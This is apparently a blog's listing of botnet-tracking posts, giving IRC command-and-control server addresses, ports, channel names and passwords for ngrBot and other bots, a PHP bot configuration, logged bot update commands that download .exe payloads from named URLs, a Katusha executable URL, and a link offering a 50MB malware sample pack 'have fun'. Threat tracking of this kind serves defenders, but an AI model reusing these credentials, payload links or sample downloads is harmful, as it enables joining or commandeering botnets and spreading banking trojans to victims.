208.115.225.28(1k linux bots hosted in United States Limestone Networks Inc)

Uncategorized

var $config = array(“server”=>”208.115.225.28”, “port”=>”4095”, “pass”=>””, “prefix”=>”BoT”, “maxrand”=>”3”, “chan”=>”#dadadu”, “chan2″=>”#dadadu”, “key”=>”123456”, “modes”=>”+p”, “password”=>”123”, “trigger”=>”.”, “hostauth”=>”*” chanel #dada 123456 around 500 bots Local users: Current Local Users: 507 Max: 1018 Global users: Current Global Users: 507 Max: 1018 Now talking in #dada Joins: [A]BoT518 [BoT865@424B246F.A811AE52.793AADE4.IP] Modes On: [ #dada ] [ + ] Joins: [A]BoT987 [BoT645@6EF97CFD.41C04E64.3286894F.IP]Read more...

49mb malware samples

Uncategorized

Here we go another malwares package around 50mb with banking trojans irc bots(ngrBot samples) have fun Download: http://adf.ly/2Gd5i

www.ircperu.com(ngrBot hosted in Russian Federation Oao Webalta)

Uncategorized

www.ircperu.com DNS_TYPE_A 92.241.165.160 92.241.165.160:1863 Nick: n{AT|XPa}plexwne Username: plexwne Server Pass: ngrBot Joined Channel: #IrcPeru with Password PeruRulz!! Channel Topic for Channel #IrcPeru: “.up http://formulasymanuales.net/images/modules/smiley/thumbsup.gif.exe 0e2faa16ba5ab03e7ab4102497e2fb8f , .mdns http://www.wellnessfarm-shop.de/shop/thumbs.txt” Private Message to Channel #IrcPeru: “[DNS]: Blocked 0 domain(s) – Redirected 34 domain(s)” UPDATE: ircperu.com:1863 Remote Host Port Number 141.105.66.247 1863 PASS ngrBot NICK n{US|XPa}uxfxodg USER uxfxodgRead more...

92.241.165.134(ngrBot hosted in Russian Federation Oao Webalta)

Uncategorized

Remote Host Port Number 200.122.132.122 80 213.251.170.52 80 81.169.145.73 80 92.241.165.134 7654 PASS ngrBot NICK n{US|XPa}bbvvotv USER bbvvotv 0 0 :bbvvotv JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://coopeande5.com/imagenes/principal.jpg.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0 PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 10 domain(s) UPDATE: PRIVMSG #oldgold :[DNS]: BlockedRead more...

Packed.Win32.Katusha(malware hosted in Netherlands Amsterdam Nforce Entertainment B.v)

Uncategorized

dq.javagames7.com Resolved : [ dq.javagames7.com ] To [ 109.201.135.61 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.60 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.62 ] Resolved : [ dq.javagames7.com ] To [ 109.201.135.63 ] – TCP Connection Attempts: 109.201.135.63:8800 109.201.135.61:8800 109.201.135.62:8800 109.201.135.60:8800 exe file: http://31.184.237.180/dqs.exe hosting infos: http://whois.domaintools.com/109.201.135.63